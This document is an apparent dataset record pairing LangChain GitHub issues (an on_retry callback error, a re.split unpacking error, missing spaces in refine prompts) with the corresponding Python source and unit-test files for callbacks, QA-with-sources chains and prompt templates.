"""Base callback handler that can be used to handle callbacks in langchain.""" from __future__ import annotations from typing import TYPE_CHECKING, Any, Dict, List, Optional, Sequence, Union from uuid import UUID if TYPE_CHECKING: from langchain.schema.agent import AgentAction, AgentFinish from langchain.schema.document import Document from langchain.schema.messages import BaseMessage from langchain.schema.output import LLMResult class RetrieverManagerMixin: """Mixin for Retriever callbacks.""" def on_retriever_error( self, error: Union[Exception, KeyboardInterrupt], *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run when Retriever errors.""" def on_retriever_end( self, documents: Sequence[Document], *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run when Retriever ends running.""" class LLMManagerMixin: """Mixin for LLM callbacks.""" def on_llm_new_token( self, token: str, *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run on new LLM token. Only available when streaming is enabled.""" def on_llm_end( self, response: LLMResult, *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run when LLM ends running.""" def on_llm_error( self, error: Union[Exception, KeyboardInterrupt], *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run when LLM errors.""" class ChainManagerMixin: """Mixin for chain callbacks.""" def on_chain_end( self, outputs: Dict[str, Any], *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run when chain ends running.""" def on_chain_error( self, error: Union[Exception, KeyboardInterrupt], *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run when chain errors.""" def on_agent_action( self, action: AgentAction, *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run on agent action.""" def on_agent_finish( self, finish: AgentFinish, *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run on agent end.""" class ToolManagerMixin: """Mixin for tool callbacks.""" def on_tool_end( self, output: str, *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run when tool ends running.""" def on_tool_error( self, error: Union[Exception, KeyboardInterrupt], *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run when tool errors.""" class CallbackManagerMixin: """Mixin for callback manager.""" def on_llm_start( self, serialized: Dict[str, Any], prompts: List[str], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> Any: """Run when LLM starts running.""" def on_chat_model_start( self, serialized: Dict[str, Any], messages: List[List[BaseMessage]], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> Any: """Run when a chat model starts running.""" raise NotImplementedError( f"{self.__class__.__name__} does not implement `on_chat_model_start`" ) def on_retriever_start( self, serialized: Dict[str, Any], query: str, *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> Any: """Run when Retriever starts running.""" def on_chain_start( self, serialized: Dict[str, Any], inputs: Dict[str, Any], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> Any: """Run when chain starts running.""" def on_tool_start( self, serialized: Dict[str, Any], input_str: str, *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> Any: """Run when tool starts running.""" class RunManagerMixin: """Mixin for run manager.""" def on_text( self, text: str, *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run on arbitrary text.""" class BaseCallbackHandler( LLMManagerMixin, ChainManagerMixin, ToolManagerMixin, RetrieverManagerMixin, CallbackManagerMixin, RunManagerMixin, ): """Base callback handler that can be used to handle callbacks from langchain.""" raise_error: bool = False run_inline: bool = False @property def ignore_llm(self) -> bool: """Whether to ignore LLM callbacks.""" return False @property def ignore_retry(self) -> bool: """Whether to ignore retry callbacks.""" return False @property def ignore_chain(self) -> bool: """Whether to ignore chain callbacks.""" return False @property def ignore_agent(self) -> bool: """Whether to ignore agent callbacks.""" return False @property def ignore_retriever(self) -> bool: """Whether to ignore retriever callbacks.""" return False @property def ignore_chat_model(self) -> bool: """Whether to ignore chat model callbacks.""" return False class AsyncCallbackHandler(BaseCallbackHandler): """Async callback handler that can be used to handle callbacks from langchain.""" async def on_llm_start( self, serialized: Dict[str, Any], prompts: List[str], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> None: """Run when LLM starts running.""" async def on_chat_model_start( self, serialized: Dict[str, Any], messages: List[List[BaseMessage]], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> Any: """Run when a chat model starts running.""" raise NotImplementedError( f"{self.__class__.__name__} does not implement `on_chat_model_start`" ) async def on_llm_new_token( self, token: str, *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run on new LLM token. Only available when streaming is enabled.""" async def on_llm_end( self, response: LLMResult, *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run when LLM ends running.""" async def on_llm_error( self, error: Union[Exception, KeyboardInterrupt], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run when LLM errors.""" async def on_chain_start( self, serialized: Dict[str, Any], inputs: Dict[str, Any], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> None: """Run when chain starts running.""" async def on_chain_end( self, outputs: Dict[str, Any], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run when chain ends running.""" async def on_chain_error( self, error: Union[Exception, KeyboardInterrupt], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run when chain errors.""" async def on_tool_start( self, serialized: Dict[str, Any], input_str: str, *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> None: """Run when tool starts running.""" async def on_tool_end( self, output: str, *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run when tool ends running.""" async def on_tool_error( self, error: Union[Exception, KeyboardInterrupt], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run when tool errors.""" async def on_text( self, text: str, *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run on arbitrary text.""" async def on_agent_action( self, action: AgentAction, *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run on agent action.""" async def on_agent_finish( self, finish: AgentFinish, *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run on agent end.""" async def on_retriever_start( self, serialized: Dict[str, Any], query: str, *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> None: """Run on retriever start.""" async def on_retriever_end( self, documents: Sequence[Document], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run on retriever end.""" async def on_retriever_error( self, error: Union[Exception, KeyboardInterrupt], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run on retriever error.""" class BaseCallbackManager(CallbackManagerMixin): """Base callback manager that handles callbacks from LangChain.""" def __init__( self, handlers: List[BaseCallbackHandler], inheritable_handlers: Optional[List[BaseCallbackHandler]] = None, parent_run_id: Optional[UUID] = None, *, tags: Optional[List[str]] = None, inheritable_tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, inheritable_metadata: Optional[Dict[str, Any]] = None, ) -> None: """Initialize callback manager.""" self.handlers: List[BaseCallbackHandler] = handlers self.inheritable_handlers: List[BaseCallbackHandler] = ( inheritable_handlers or [] ) self.parent_run_id: Optional[UUID] = parent_run_id self.tags = tags or [] self.inheritable_tags = inheritable_tags or [] self.metadata = metadata or {} self.inheritable_metadata = inheritable_metadata or {} @property def is_async(self) -> bool: """Whether the callback manager is async.""" return False def add_handler(self, handler: BaseCallbackHandler, inherit: bool = True) -> None: """Add a handler to the callback manager.""" if handler not in self.handlers: self.handlers.append(handler) if inherit and handler not in self.inheritable_handlers: self.inheritable_handlers.append(handler) def remove_handler(self, handler: BaseCallbackHandler) -> None: """Remove a handler from the callback manager.""" self.handlers.remove(handler) self.inheritable_handlers.remove(handler) def set_handlers( self, handlers: List[BaseCallbackHandler], inherit: bool = True ) -> None: """Set handlers as the only handlers on the callback manager.""" self.handlers = [] self.inheritable_handlers = [] for handler in handlers: self.add_handler(handler, inherit=inherit) def set_handler(self, handler: BaseCallbackHandler, inherit: bool = True) -> None: """Set handler as the only handler on the callback manager.""" self.set_handlers([handler], inherit=inherit) def add_tags(self, tags: List[str], inherit: bool = True) -> None: for tag in tags: if tag in self.tags: self.remove_tags([tag]) self.tags.extend(tags) if inherit: self.inheritable_tags.extend(tags) def remove_tags(self, tags: List[str]) -> None: for tag in tags: self.tags.remove(tag) self.inheritable_tags.remove(tag) def add_metadata(self, metadata: Dict[str, Any], inherit: bool = True) -> None: self.metadata.update(metadata) if inherit: self.inheritable_metadata.update(metadata) def remove_metadata(self, keys: List[str]) -> None: for key in keys: self.metadata.pop(key) self.inheritable_metadata.pop(key) Callbacks = Optional[Union[List[BaseCallbackHandler], BaseCallbackManager]]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,542
Error: 'OpenAICallbackHandler' object has no attribute 'on_retry'`
### System Info **LangChain:** 0.0.248 **Python:** 3.10.10 **OS version:** Linux 5.10.178-162.673.amzn2.x86_64 ### Who can help? @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [X] Callbacks/Tracing - [ ] Async ### Reproduction **Code:** ``` try: with get_openai_callback() as cb: llm_chain = LLMChain(llm=llm, prompt=prompt_main) all_text = str(template) + str(prompt) + str(usescases) + str(transcript) threshold = (llm.get_num_tokens(text=all_text) + 800) dataframe_copy.loc[index, "Total Tokens"] = threshold if int(threshold) <= 4000: chatgpt_output = llm_chain.run({"prompt":prompt, "use_cases_dictionary":usescases, "transcript":transcript}) chatgpt_output = text_post_processing(chatgpt_output) dataframe_copy.loc[index, "ChatGPT Output"] = chatgpt_output dataframe_copy.loc[index, "Cost (USD)"] = cb.total_cost else: dataframe_copy.loc[index, "ChatGPT Output"] = " " dataframe_copy.loc[index, "Cost (USD)"] = " " except Exception as e: dataframe_copy.loc[index, "ChatGPT Output"] = " " dataframe_copy.loc[index, "Cost (USD)"] = " " continue ``` **Error Message:** `Retrying langchain.chat_models.openai.ChatOpenAI.completion_with_retry.<locals>._completion_with_retry in 4.0 seconds as it raised APIError: Bad gateway. {"error":{"code":502,"message":"Bad gateway.","param":null,"type":"cf_bad_gateway"}} 502 {'error': {'code': 502, 'message': 'Bad gateway.', 'param': None, 'type': 'cf_bad_gateway'}} {'Date': 'Mon, 31 Jul 2023 20:24:53 GMT', 'Content-Type': 'application/json', 'Content-Length': '84', 'Connection': 'keep-alive', 'X-Frame-Options': 'SAMEORIGIN', 'Referrer-Policy': 'same-origin', 'Cache-Control': 'private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0', 'Expires': 'Thu, 01 Jan 1970 00:00:01 GMT', 'Server': 'cloudflare', 'CF-RAY': '7ef889a50eaca7f3-SYD', 'alt-svc': 'h3=":443"; ma=86400'}. Error in OpenAICallbackHandler.on_retry callback: 'OpenAICallbackHandler' object has no attribute 'on_retry'` ![bug](https://github.com/langchain-ai/langchain/assets/43797457/9b8025e0-f486-48bb-9d74-fdaa6cef4574) ### Expected behavior I went through the callback [documentation ](https://api.python.langchain.com/en/latest/callbacks/langchain.callbacks.openai_info.OpenAICallbackHandler.html) and yes the "on_retry" method wasn't included over there. So I guess the team needs to modify the core code for OpenAICallbackHandler because it's calling "on_retry" for some reason.
https://github.com/langchain-ai/langchain/issues/8542
https://github.com/langchain-ai/langchain/pull/9230
d0a0d560add6c5bc6ded60be506a87d98bf333c3
c478fc208ed4c29e979abeb7a532eb4d01431e1b
"2023-07-31T21:01:43Z"
python
"2023-08-14T23:45:17Z"
libs/langchain/tests/unit_tests/callbacks/test_openai_info.py
import pytest from langchain.callbacks import OpenAICallbackHandler from langchain.llms.openai import BaseOpenAI from langchain.schema import LLMResult @pytest.fixture def handler() -> OpenAICallbackHandler: return OpenAICallbackHandler() def test_on_llm_end(handler: OpenAICallbackHandler) -> None: response = LLMResult( generations=[], llm_output={ "token_usage": { "prompt_tokens": 2, "completion_tokens": 1, "total_tokens": 3, }, "model_name": BaseOpenAI.__fields__["model_name"].default, }, ) handler.on_llm_end(response) assert handler.successful_requests == 1 assert handler.total_tokens == 3 assert handler.prompt_tokens == 2 assert handler.completion_tokens == 1 assert handler.total_cost > 0 def test_on_llm_end_custom_model(handler: OpenAICallbackHandler) -> None: response = LLMResult( generations=[], llm_output={ "token_usage": { "prompt_tokens": 2, "completion_tokens": 1, "total_tokens": 3, }, "model_name": "foo-bar", }, ) handler.on_llm_end(response) assert handler.total_cost == 0 def test_on_llm_end_finetuned_model(handler: OpenAICallbackHandler) -> None: response = LLMResult( generations=[], llm_output={ "token_usage": { "prompt_tokens": 2, "completion_tokens": 1, "total_tokens": 3, }, "model_name": "ada:ft-your-org:custom-model-name-2022-02-15-04-21-04", }, ) handler.on_llm_end(response) assert handler.total_cost > 0 @pytest.mark.parametrize( "model_name,expected_cost", [ ("gpt-35-turbo", 0.0035), ("gpt-35-turbo-0301", 0.0035), ( "gpt-35-turbo-0613", 0.0035, ), ( "gpt-35-turbo-16k-0613", 0.007, ), ( "gpt-35-turbo-16k", 0.007, ), ("gpt-4", 0.09), ("gpt-4-0314", 0.09), ("gpt-4-0613", 0.09), ("gpt-4-32k", 0.18), ("gpt-4-32k-0314", 0.18), ("gpt-4-32k-0613", 0.18), ], ) def test_on_llm_end_azure_openai( handler: OpenAICallbackHandler, model_name: str, expected_cost: float ) -> None: response = LLMResult( generations=[], llm_output={ "token_usage": { "prompt_tokens": 1000, "completion_tokens": 1000, "total_tokens": 2000, }, "model_name": model_name, }, ) handler.on_llm_end(response) assert handler.total_cost == expected_cost @pytest.mark.parametrize( "model_name", ["gpt-35-turbo-16k-0301", "gpt-4-0301", "gpt-4-32k-0301"] ) def test_on_llm_end_no_cost_invalid_model( handler: OpenAICallbackHandler, model_name: str ) -> None: response = LLMResult( generations=[], llm_output={ "token_usage": { "prompt_tokens": 1000, "completion_tokens": 1000, "total_tokens": 2000, }, "model_name": model_name, }, ) handler.on_llm_end(response) assert handler.total_cost == 0
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,184
Issue: RetrievalQAWithSourcesChain gives error 'too many values to unpack (expected 2)' after running.
Hello, I'm using _langchain_ for QA with court case documents. More specifically, the RetrievalQAWithSourcesChain to retrieve the answer and document source information. However, when running the chain with embedded documents, I get the following error: ``` ValueError: too many values to unpack (expected 2) Traceback: response = qa({"question": pregunta}, return_only_outputs=True) File "C:\Anaconda3\envs\iagen_3_10\lib\site-packages\langchain\chains\base.py", line 166, in __call__ raise e File "C:\Anaconda3\envs\iagen_3_10\lib\site-packages\langchain\chains\base.py", line 160, in __call__ self._call(inputs, run_manager=run_manager) File "C:\Anaconda3\envs\iagen_3_10\lib\site-packages\langchain\chains\qa_with_sources\base.py", line 132, in _call answer, sources = re.split(r"SOURCES:\s", answer) ``` The passed documents are the sections from the court case. I added the following **metadata** fields: 1. Source: PDF file name. 2. Section: Name of the section 3. Section_chunk: Numeral value used for identification in case the section was divided into chunks. 4. Page: Page where the section chunk starts. The documents are passed as retriever to the chain with FAISS (FAISS.from_documents(documents, self.embeddings)). I tried out two approaches (both resulting in the same error): 1. providing the _load_qa_chain_ as chain 2. creating it using the class method **_.from_chain_type_** My question is why does this error ocurrs. And also, if the type of metadata used may cause the errors. Thank you in advance!
https://github.com/langchain-ai/langchain/issues/7184
https://github.com/langchain-ai/langchain/pull/8716
a3c79b1909fe1cbe85394c353b0535117ef0cdf0
8bebc9206fb77ee22a9b0592c1efb32f27bb45db
"2023-07-05T09:49:42Z"
python
"2023-08-16T20:30:15Z"
libs/langchain/langchain/chains/qa_with_sources/base.py
"""Question answering with sources over documents.""" from __future__ import annotations import inspect import re from abc import ABC, abstractmethod from typing import Any, Dict, List, Optional from pydantic_v1 import Extra, root_validator from langchain.callbacks.manager import ( AsyncCallbackManagerForChainRun, CallbackManagerForChainRun, ) from langchain.chains import ReduceDocumentsChain from langchain.chains.base import Chain from langchain.chains.combine_documents.base import BaseCombineDocumentsChain from langchain.chains.combine_documents.map_reduce import MapReduceDocumentsChain from langchain.chains.combine_documents.stuff import StuffDocumentsChain from langchain.chains.llm import LLMChain from langchain.chains.qa_with_sources.loading import load_qa_with_sources_chain from langchain.chains.qa_with_sources.map_reduce_prompt import ( COMBINE_PROMPT, EXAMPLE_PROMPT, QUESTION_PROMPT, ) from langchain.docstore.document import Document from langchain.schema import BasePromptTemplate from langchain.schema.language_model import BaseLanguageModel class BaseQAWithSourcesChain(Chain, ABC): """Question answering chain with sources over documents.""" combine_documents_chain: BaseCombineDocumentsChain """Chain to use to combine documents.""" question_key: str = "question" #: :meta private: input_docs_key: str = "docs" #: :meta private: answer_key: str = "answer" #: :meta private: sources_answer_key: str = "sources" #: :meta private: return_source_documents: bool = False """Return the source documents.""" @classmethod def from_llm( cls, llm: BaseLanguageModel, document_prompt: BasePromptTemplate = EXAMPLE_PROMPT, question_prompt: BasePromptTemplate = QUESTION_PROMPT, combine_prompt: BasePromptTemplate = COMBINE_PROMPT, **kwargs: Any, ) -> BaseQAWithSourcesChain: """Construct the chain from an LLM.""" llm_question_chain = LLMChain(llm=llm, prompt=question_prompt) llm_combine_chain = LLMChain(llm=llm, prompt=combine_prompt) combine_results_chain = StuffDocumentsChain( llm_chain=llm_combine_chain, document_prompt=document_prompt, document_variable_name="summaries", ) reduce_documents_chain = ReduceDocumentsChain( combine_documents_chain=combine_results_chain ) combine_documents_chain = MapReduceDocumentsChain( llm_chain=llm_question_chain, reduce_documents_chain=reduce_documents_chain, document_variable_name="context", ) return cls( combine_documents_chain=combine_documents_chain, **kwargs, ) @classmethod def from_chain_type( cls, llm: BaseLanguageModel, chain_type: str = "stuff", chain_type_kwargs: Optional[dict] = None, **kwargs: Any, ) -> BaseQAWithSourcesChain: """Load chain from chain type.""" _chain_kwargs = chain_type_kwargs or {} combine_documents_chain = load_qa_with_sources_chain( llm, chain_type=chain_type, **_chain_kwargs ) return cls(combine_documents_chain=combine_documents_chain, **kwargs) class Config: """Configuration for this pydantic object.""" extra = Extra.forbid arbitrary_types_allowed = True @property def input_keys(self) -> List[str]: """Expect input key. :meta private: """ return [self.question_key] @property def output_keys(self) -> List[str]: """Return output key. :meta private: """ _output_keys = [self.answer_key, self.sources_answer_key] if self.return_source_documents: _output_keys = _output_keys + ["source_documents"] return _output_keys @root_validator(pre=True) def validate_naming(cls, values: Dict) -> Dict: """Fix backwards compatibility in naming.""" if "combine_document_chain" in values: values["combine_documents_chain"] = values.pop("combine_document_chain") return values @abstractmethod def _get_docs( self, inputs: Dict[str, Any], *, run_manager: CallbackManagerForChainRun, ) -> List[Document]: """Get docs to run questioning over.""" def _call( self, inputs: Dict[str, Any], run_manager: Optional[CallbackManagerForChainRun] = None, ) -> Dict[str, str]: _run_manager = run_manager or CallbackManagerForChainRun.get_noop_manager() accepts_run_manager = ( "run_manager" in inspect.signature(self._get_docs).parameters ) if accepts_run_manager: docs = self._get_docs(inputs, run_manager=_run_manager) else: docs = self._get_docs(inputs) # type: ignore[call-arg] answer = self.combine_documents_chain.run( input_documents=docs, callbacks=_run_manager.get_child(), **inputs ) if re.search(r"SOURCES:\s", answer): answer, sources = re.split(r"SOURCES:\s", answer) else: sources = "" result: Dict[str, Any] = { self.answer_key: answer, self.sources_answer_key: sources, } if self.return_source_documents: result["source_documents"] = docs return result @abstractmethod async def _aget_docs( self, inputs: Dict[str, Any], *, run_manager: AsyncCallbackManagerForChainRun, ) -> List[Document]: """Get docs to run questioning over.""" async def _acall( self, inputs: Dict[str, Any], run_manager: Optional[AsyncCallbackManagerForChainRun] = None, ) -> Dict[str, Any]: _run_manager = run_manager or AsyncCallbackManagerForChainRun.get_noop_manager() accepts_run_manager = ( "run_manager" in inspect.signature(self._aget_docs).parameters ) if accepts_run_manager: docs = await self._aget_docs(inputs, run_manager=_run_manager) else: docs = await self._aget_docs(inputs) # type: ignore[call-arg] answer = await self.combine_documents_chain.arun( input_documents=docs, callbacks=_run_manager.get_child(), **inputs ) if re.search(r"SOURCES:\s", answer): answer, sources = re.split(r"SOURCES:\s", answer) else: sources = "" result: Dict[str, Any] = { self.answer_key: answer, self.sources_answer_key: sources, } if self.return_source_documents: result["source_documents"] = docs return result class QAWithSourcesChain(BaseQAWithSourcesChain): """Question answering with sources over documents.""" input_docs_key: str = "docs" #: :meta private: @property def input_keys(self) -> List[str]: """Expect input key. :meta private: """ return [self.input_docs_key, self.question_key] def _get_docs( self, inputs: Dict[str, Any], *, run_manager: CallbackManagerForChainRun, ) -> List[Document]: """Get docs to run questioning over.""" return inputs.pop(self.input_docs_key) async def _aget_docs( self, inputs: Dict[str, Any], *, run_manager: AsyncCallbackManagerForChainRun, ) -> List[Document]: """Get docs to run questioning over.""" return inputs.pop(self.input_docs_key) @property def _chain_type(self) -> str: return "qa_with_sources_chain"
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,184
Issue: RetrievalQAWithSourcesChain gives error 'too many values to unpack (expected 2)' after running.
Hello, I'm using _langchain_ for QA with court case documents. More specifically, the RetrievalQAWithSourcesChain to retrieve the answer and document source information. However, when running the chain with embedded documents, I get the following error: ``` ValueError: too many values to unpack (expected 2) Traceback: response = qa({"question": pregunta}, return_only_outputs=True) File "C:\Anaconda3\envs\iagen_3_10\lib\site-packages\langchain\chains\base.py", line 166, in __call__ raise e File "C:\Anaconda3\envs\iagen_3_10\lib\site-packages\langchain\chains\base.py", line 160, in __call__ self._call(inputs, run_manager=run_manager) File "C:\Anaconda3\envs\iagen_3_10\lib\site-packages\langchain\chains\qa_with_sources\base.py", line 132, in _call answer, sources = re.split(r"SOURCES:\s", answer) ``` The passed documents are the sections from the court case. I added the following **metadata** fields: 1. Source: PDF file name. 2. Section: Name of the section 3. Section_chunk: Numeral value used for identification in case the section was divided into chunks. 4. Page: Page where the section chunk starts. The documents are passed as retriever to the chain with FAISS (FAISS.from_documents(documents, self.embeddings)). I tried out two approaches (both resulting in the same error): 1. providing the _load_qa_chain_ as chain 2. creating it using the class method **_.from_chain_type_** My question is why does this error ocurrs. And also, if the type of metadata used may cause the errors. Thank you in advance!
https://github.com/langchain-ai/langchain/issues/7184
https://github.com/langchain-ai/langchain/pull/8716
a3c79b1909fe1cbe85394c353b0535117ef0cdf0
8bebc9206fb77ee22a9b0592c1efb32f27bb45db
"2023-07-05T09:49:42Z"
python
"2023-08-16T20:30:15Z"
libs/langchain/tests/unit_tests/chains/test_qa_with_sources.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
3,117
Missing new lines or empty spaces in refine default prompt.
I'm not sure if it's a typo or not but the default prompt in [langchain](https://github.com/hwchase17/langchain/tree/master/langchain)/[langchain](https://github.com/hwchase17/langchain/tree/master/langchain)/[chains](https://github.com/hwchase17/langchain/tree/master/langchain/chains)/[summarize](https://github.com/hwchase17/langchain/tree/master/langchain/chains/summarize)/[refine_prompts.py](https://github.com/hwchase17/langchain/tree/master/langchain/chains/summarize/refine_prompts.py) seems to miss a empty string or a `\n ` ``` REFINE_PROMPT_TMPL = ( "Your job is to produce a final summary\n" "We have provided an existing summary up to a certain point: {existing_answer}\n" "We have the opportunity to refine the existing summary" "(only if needed) with some more context below.\n" "------------\n" "{text}\n" "------------\n" "Given the new context, refine the original summary" "If the context isn't useful, return the original summary." ) ``` It will produce `refine the original summaryIf the context isn't useful` and `existing summary(only if needed)` I could proabbly fix it with a PR ( if it's unintentionnal), but I prefer to let someone more competent to do it as i'm not used to create PR's in large projects like this.
https://github.com/langchain-ai/langchain/issues/3117
https://github.com/langchain-ai/langchain/pull/9957
4b1532876710e08aa70cdd0d52b18084f85eaed3
29270e0378661fe3d5a77cbe95311f9d4b5d33e8
"2023-04-18T22:32:58Z"
python
"2023-08-31T14:29:49Z"
libs/langchain/langchain/chains/question_answering/refine_prompts.py
# flake8: noqa from langchain.chains.prompt_selector import ConditionalPromptSelector, is_chat_model from langchain.prompts.chat import ( AIMessagePromptTemplate, ChatPromptTemplate, HumanMessagePromptTemplate, SystemMessagePromptTemplate, ) from langchain.prompts.prompt import PromptTemplate DEFAULT_REFINE_PROMPT_TMPL = ( "The original question is as follows: {question}\n" "We have provided an existing answer: {existing_answer}\n" "We have the opportunity to refine the existing answer" "(only if needed) with some more context below.\n" "------------\n" "{context_str}\n" "------------\n" "Given the new context, refine the original answer to better " "answer the question. " "If the context isn't useful, return the original answer." ) DEFAULT_REFINE_PROMPT = PromptTemplate( input_variables=["question", "existing_answer", "context_str"], template=DEFAULT_REFINE_PROMPT_TMPL, ) refine_template = ( "We have the opportunity to refine the existing answer" "(only if needed) with some more context below.\n" "------------\n" "{context_str}\n" "------------\n" "Given the new context, refine the original answer to better " "answer the question. " "If the context isn't useful, return the original answer." ) messages = [ HumanMessagePromptTemplate.from_template("{question}"), AIMessagePromptTemplate.from_template("{existing_answer}"), HumanMessagePromptTemplate.from_template(refine_template), ] CHAT_REFINE_PROMPT = ChatPromptTemplate.from_messages(messages) REFINE_PROMPT_SELECTOR = ConditionalPromptSelector( default_prompt=DEFAULT_REFINE_PROMPT, conditionals=[(is_chat_model, CHAT_REFINE_PROMPT)], ) DEFAULT_TEXT_QA_PROMPT_TMPL = ( "Context information is below. \n" "---------------------\n" "{context_str}" "\n---------------------\n" "Given the context information and not prior knowledge, " "answer the question: {question}\n" ) DEFAULT_TEXT_QA_PROMPT = PromptTemplate( input_variables=["context_str", "question"], template=DEFAULT_TEXT_QA_PROMPT_TMPL ) chat_qa_prompt_template = ( "Context information is below. \n" "---------------------\n" "{context_str}" "\n---------------------\n" "Given the context information and not prior knowledge, " "answer any questions" ) messages = [ SystemMessagePromptTemplate.from_template(chat_qa_prompt_template), HumanMessagePromptTemplate.from_template("{question}"), ] CHAT_QUESTION_PROMPT = ChatPromptTemplate.from_messages(messages) QUESTION_PROMPT_SELECTOR = ConditionalPromptSelector( default_prompt=DEFAULT_TEXT_QA_PROMPT, conditionals=[(is_chat_model, CHAT_QUESTION_PROMPT)], )
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
3,117
Missing new lines or empty spaces in refine default prompt.
I'm not sure if it's a typo or not but the default prompt in [langchain](https://github.com/hwchase17/langchain/tree/master/langchain)/[langchain](https://github.com/hwchase17/langchain/tree/master/langchain)/[chains](https://github.com/hwchase17/langchain/tree/master/langchain/chains)/[summarize](https://github.com/hwchase17/langchain/tree/master/langchain/chains/summarize)/[refine_prompts.py](https://github.com/hwchase17/langchain/tree/master/langchain/chains/summarize/refine_prompts.py) seems to miss a empty string or a `\n ` ``` REFINE_PROMPT_TMPL = ( "Your job is to produce a final summary\n" "We have provided an existing summary up to a certain point: {existing_answer}\n" "We have the opportunity to refine the existing summary" "(only if needed) with some more context below.\n" "------------\n" "{text}\n" "------------\n" "Given the new context, refine the original summary" "If the context isn't useful, return the original summary." ) ``` It will produce `refine the original summaryIf the context isn't useful` and `existing summary(only if needed)` I could proabbly fix it with a PR ( if it's unintentionnal), but I prefer to let someone more competent to do it as i'm not used to create PR's in large projects like this.
https://github.com/langchain-ai/langchain/issues/3117
https://github.com/langchain-ai/langchain/pull/9957
4b1532876710e08aa70cdd0d52b18084f85eaed3
29270e0378661fe3d5a77cbe95311f9d4b5d33e8
"2023-04-18T22:32:58Z"
python
"2023-08-31T14:29:49Z"
libs/langchain/langchain/chains/summarize/refine_prompts.py
# flake8: noqa from langchain.prompts import PromptTemplate REFINE_PROMPT_TMPL = ( "Your job is to produce a final summary\n" "We have provided an existing summary up to a certain point: {existing_answer}\n" "We have the opportunity to refine the existing summary" "(only if needed) with some more context below.\n" "------------\n" "{text}\n" "------------\n" "Given the new context, refine the original summary\n" "If the context isn't useful, return the original summary." ) REFINE_PROMPT = PromptTemplate( input_variables=["existing_answer", "text"], template=REFINE_PROMPT_TMPL, ) prompt_template = """Write a concise summary of the following: "{text}" CONCISE SUMMARY:""" PROMPT = PromptTemplate(template=prompt_template, input_variables=["text"])
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,307
